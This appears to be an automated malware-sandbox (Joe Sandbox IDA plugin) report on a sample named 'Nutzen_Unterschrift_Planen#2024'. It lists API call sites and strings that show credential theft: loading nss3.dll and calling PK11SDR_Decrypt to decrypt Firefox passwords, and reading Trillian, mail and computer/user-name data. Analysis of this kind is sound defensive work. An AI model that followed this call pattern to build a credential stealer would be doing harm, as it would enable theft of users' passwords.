                                                            • String ID:
                                                            • API String ID: 368790112-0
                                                            APIs
                                                            Strings
                                                            • too many SQL variables, xrefs: 0042C6FD
                                                            • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                            • API String ID: 2221118986-515162456
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE
                                                            • API String ID: 3510742995-3459038510
                                                            APIs
                                                              • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                            • memset.MSVCRT ref: 004026AD
                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                              • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                              • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                              • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                            • LocalFree.KERNEL32(?), ref: 004027A6
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                            • String ID:
                                                            • API String ID: 3503910906-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0040C922
                                                            • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                            • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                            • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Message$MenuPostSendStringmemset
                                                            • String ID:
                                                            • API String ID: 3798638045-0
                                                            APIs
                                                              • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                              • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                            • strlen.MSVCRT ref: 0040B60B
                                                            • atoi.MSVCRT(?,00000000,?,75D50A60,?,00000000), ref: 0040B619
                                                            • _mbsicmp.MSVCRT ref: 0040B66C
                                                            • _mbsicmp.MSVCRT ref: 0040B67F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbsicmp$??2@??3@atoistrlen
                                                            • String ID:
                                                            • API String ID: 4107816708-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: >$>$>
                                                            • API String ID: 39653677-3911187716
                                                            APIs
                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: @
                                                            • API String ID: 3510742995-2766056989
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FD9
                                                            • memset.MSVCRT ref: 00407FEA
                                                            • memcpy.MSVCRT(0045791C,?,00000000,00000000,00000000,00000000,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@??3@memcpymemset
                                                            • String ID:
                                                            • API String ID: 1865533344-0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _strcmpi
                                                            • String ID: C@$mail.identity
                                                            • API String ID: 1439213657-721921413
                                                            APIs
                                                            • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                            • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                            • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                            • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                            • String ID:
                                                            • API String ID: 1479990042-0
                                                            APIs
                                                            • memset.MSVCRT ref: 00406640
                                                              • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                              • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                              • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                            • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                            • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset$memcmp
                                                            • String ID: Ul@
                                                            • API String ID: 270934217-715280498
                                                            APIs
                                                              • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                              • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75D50A60), ref: 00408EBE
                                                            • sprintf.MSVCRT ref: 0040B929
                                                            • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                              • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75D50A60), ref: 00408E31
                                                              • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                            • sprintf.MSVCRT ref: 0040B953
                                                            • _mbscat.MSVCRT ref: 0040B966
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                            • String ID:
                                                            • API String ID: 203655857-0
                                                            APIs
                                                            • memset.MSVCRT ref: 0040ADE8
                                                            • memset.MSVCRT ref: 0040ADFE
                                                              • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                              • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                            • sprintf.MSVCRT ref: 0040AE28
                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,75D50A60,00000000,?,?,0040A7BE,00000001,0044CBC0,75D50A60), ref: 00406D4D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                            • String ID: </%s>
                                                            • API String ID: 3699762281-259020660
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: strcmp
                                                            • String ID: PD$TeE$deE
                                                            • API String ID: 1004003707-348433437
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _ultoasprintf
                                                            • String ID: %s %s %s
                                                            • API String ID: 432394123-3850900253
                                                            APIs
                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                            • sprintf.MSVCRT ref: 0040909B
                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                            • String ID: menu_%d
                                                            • API String ID: 1129539653-2417748251
                                                            APIs
                                                            Strings
                                                            • failed memory resize %u to %u bytes, xrefs: 00411706
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _msizerealloc
                                                            • String ID: failed memory resize %u to %u bytes
                                                            • API String ID: 2713192863-2134078882
                                                            APIs
                                                              • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                            • strrchr.MSVCRT ref: 00409808
                                                            • _mbscat.MSVCRT ref: 0040981D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileModuleName_mbscatstrrchr
                                                            • String ID: _lng.ini
                                                            • API String ID: 3334749609-1948609170
                                                            APIs
                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                            • _mbscat.MSVCRT ref: 004070FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _mbscat$_mbscpystrlen
                                                            • String ID: sqlite3.dll
                                                            • API String ID: 1983510840-1155512374
                                                            APIs
                                                            • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                            • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID: MZ@
                                                            • API String ID: 1378638983-2978689999
                                                            APIs
                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID: A4@$Server Details
                                                            • API String ID: 1096422788-4071850762
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                            • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                            • memset.MSVCRT ref: 0042C932
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            APIs
                                                            • strlen.MSVCRT ref: 0040849A
                                                            • memset.MSVCRT ref: 004084D2
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,76BAE430,?,00000000), ref: 0040858F
                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,76BAE430,?,00000000), ref: 004085BA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FreeLocalmemcpymemsetstrlen
                                                            • String ID:
                                                            • API String ID: 3110682361-0
                                                            APIs
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID:
                                                            • API String ID: 3510742995-0
                                                            APIs
                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$memset
                                                            • String ID:
                                                            • API String ID: 1860491036-0
                                                            APIs
                                                            • strlen.MSVCRT ref: 0040797A
                                                            • free.MSVCRT ref: 0040799A
                                                              • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                              • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,75D50A60,00407A43,00000001,?,00000000,75D50A60,00407DBD,00000000,?,?), ref: 00406F64
                                                              • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                            • free.MSVCRT ref: 004079BD
                                                            • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.316872801424.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000004.00000002.316872801424.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000004.00000002.316872801424.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$memcpy$mallocstrlen
                                                            • String ID:
                                                            • API String ID: 3669619086-0

                                                            APIs
                                                            • memset.MSVCRT ref: 00410C6D
                                                              • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                              • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                              • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                              • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                              • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                              • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                              • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                            • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 00410C9F
                                                            • memset.MSVCRT ref: 00410CB4
                                                            • strlen.MSVCRT ref: 00410CBE
                                                            • strlen.MSVCRT ref: 00410CCC
                                                            • LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 00410D0B
                                                            • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                            • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                            • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                            • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                            • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                            • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                              • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                              • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.316874372348.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.316874372348.000000000041B000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                            • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                            • API String ID: 2719586705-3659000792

                                                            Control-flow Graph (legend: Executed / Not Executed)
                                                            • Node 156, 407c79-407dc2: memset * 4, GetComputerNameA, GetUserNameA, MultiByteToWideChar * 2, strlen * 2, memcpy
                                                            APIs
                                                            • memset.MSVCRT ref: 00407CDB
                                                            • memset.MSVCRT ref: 00407CEF
                                                            • memset.MSVCRT ref: 00407D09
                                                            • memset.MSVCRT ref: 00407D1E
                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                            • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                            • strlen.MSVCRT ref: 00407D91
                                                            • strlen.MSVCRT ref: 00407DA0
                                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.316874372348.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.316874372348.000000000041B000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
